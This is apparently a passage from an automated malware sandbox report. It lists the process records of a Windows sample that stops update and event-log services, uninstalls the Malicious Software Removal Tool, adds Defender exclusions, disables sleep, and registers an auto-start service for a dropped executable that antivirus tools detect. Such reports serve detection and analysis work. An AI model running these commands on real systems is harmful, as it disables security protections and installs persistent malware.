                                                                                                                                                                                                    Start time:13:59:44
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                                                    Imagebase:0x7ff691e80000
                                                                                                                                                                                                    File size:72'192 bytes
                                                                                                                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:31
                                                                                                                                                                                                    Start time:13:59:44
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:32
                                                                                                                                                                                                    Start time:13:59:45
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                                                    Imagebase:0x7ff691e80000
                                                                                                                                                                                                    File size:72'192 bytes
                                                                                                                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:33
                                                                                                                                                                                                    Start time:13:59:45
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:34
                                                                                                                                                                                                    Start time:13:59:45
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                                                    Imagebase:0x7ff67eca0000
                                                                                                                                                                                                    File size:96'256 bytes
                                                                                                                                                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:35
                                                                                                                                                                                                    Start time:13:59:45
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                                                    Imagebase:0x7ff67eca0000
                                                                                                                                                                                                    File size:96'256 bytes
                                                                                                                                                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:36
                                                                                                                                                                                                    Start time:13:59:45
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:37
                                                                                                                                                                                                    Start time:13:59:45
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                                                    Imagebase:0x7ff67eca0000
                                                                                                                                                                                                    File size:96'256 bytes
                                                                                                                                                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:38
                                                                                                                                                                                                    Start time:13:59:45
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:39
                                                                                                                                                                                                    Start time:13:59:45
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                                                    Imagebase:0x7ff67eca0000
                                                                                                                                                                                                    File size:96'256 bytes
                                                                                                                                                                                                    MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:40
                                                                                                                                                                                                    Start time:13:59:45
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:41
                                                                                                                                                                                                    Start time:13:59:45
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\dialer.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\dialer.exe
                                                                                                                                                                                                    Imagebase:0x7ff643940000
                                                                                                                                                                                                    File size:39'936 bytes
                                                                                                                                                                                                    MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:42
                                                                                                                                                                                                    Start time:13:59:45
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:43
                                                                                                                                                                                                    Start time:13:59:45
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\sc.exe delete "SXJAJUSN"
                                                                                                                                                                                                    Imagebase:0x7ff691e80000
                                                                                                                                                                                                    File size:72'192 bytes
                                                                                                                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:44
                                                                                                                                                                                                    Start time:13:59:45
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:45
                                                                                                                                                                                                    Start time:13:59:45
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\sc.exe create "SXJAJUSN" binpath= "C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe" start= "auto"
                                                                                                                                                                                                    Imagebase:0x7ff691e80000
                                                                                                                                                                                                    File size:72'192 bytes
                                                                                                                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:46
                                                                                                                                                                                                    Start time:13:59:45
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:47
                                                                                                                                                                                                    Start time:13:59:45
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\winlogon.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:winlogon.exe
                                                                                                                                                                                                    Imagebase:0x7ff618820000
                                                                                                                                                                                                    File size:906'240 bytes
                                                                                                                                                                                                    MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:48
                                                                                                                                                                                                    Start time:13:59:46
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                                                                                                                                                                    Imagebase:0x7ff691e80000
                                                                                                                                                                                                    File size:72'192 bytes
                                                                                                                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:49
                                                                                                                                                                                                    Start time:13:59:46
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\lsass.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\lsass.exe
                                                                                                                                                                                                    Imagebase:0x7ff786790000
                                                                                                                                                                                                    File size:59'456 bytes
                                                                                                                                                                                                    MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:50
                                                                                                                                                                                                    Start time:13:59:46
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\sc.exe start "SXJAJUSN"
                                                                                                                                                                                                    Imagebase:0x7ff691e80000
                                                                                                                                                                                                    File size:72'192 bytes
                                                                                                                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:51
                                                                                                                                                                                                    Start time:13:59:46
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:52
                                                                                                                                                                                                    Start time:13:59:46
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:53
                                                                                                                                                                                                    Start time:13:59:46
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\ProgramData\guqotihtvufx\jnxsifnrdetl.exe
                                                                                                                                                                                                    Imagebase:0x7ff7fd500000
                                                                                                                                                                                                    File size:5'614'592 bytes
                                                                                                                                                                                                    MD5 hash:DF65134B0B2B2CC03F07647794B274E5
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                    • Detection: 96%, ReversingLabs
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:54
                                                                                                                                                                                                    Start time:13:59:46
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                                    Imagebase:0x7ff7582a0000
                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:55
                                                                                                                                                                                                    Start time:13:59:46
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:56
                                                                                                                                                                                                    Start time:13:59:46
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                                                                                                                                                    Imagebase:0x7ff62c440000
                                                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:57
                                                                                                                                                                                                    Start time:13:59:47
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\dwm.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:dwm.exe
                                                                                                                                                                                                    Imagebase:0x7ff63a830000
                                                                                                                                                                                                    File size:94'720 bytes
                                                                                                                                                                                                    MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:58
                                                                                                                                                                                                    Start time:13:59:51
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                    Imagebase:0x7ff6fd780000
                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:59
                                                                                                                                                                                                    Start time:13:59:51
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                                                    Imagebase:0x7ff691e80000
                                                                                                                                                                                                    File size:72'192 bytes
                                                                                                                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:60
                                                                                                                                                                                                    Start time:13:59:51
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:61
                                                                                                                                                                                                    Start time:13:59:51
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:62
                                                                                                                                                                                                    Start time:13:59:51
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\wusa.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                    Imagebase:0x7ff7b1800000
                                                                                                                                                                                                    File size:345'088 bytes
                                                                                                                                                                                                    MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:63
                                                                                                                                                                                                    Start time:13:59:51
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                                                    Imagebase:0x7ff691e80000
                                                                                                                                                                                                    File size:72'192 bytes
                                                                                                                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:64
                                                                                                                                                                                                    Start time:13:59:51
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:65
                                                                                                                                                                                                    Start time:13:59:51
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                                                    Imagebase:0x7ff691e80000
                                                                                                                                                                                                    File size:72'192 bytes
                                                                                                                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:66
                                                                                                                                                                                                    Start time:13:59:51
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:67
                                                                                                                                                                                                    Start time:13:59:51
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                                                    Imagebase:0x7ff691e80000
                                                                                                                                                                                                    File size:72'192 bytes
                                                                                                                                                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:68
                                                                                                                                                                                                    Start time:13:59:51
                                                                                                                                                                                                    Start date:14/03/2024
                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    Imagebase:0x7ff6684c0000
                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                    General

                                                                                                                                                                                                    Target ID:69
                                                                                                                                                                                                    Start time:13:59:51
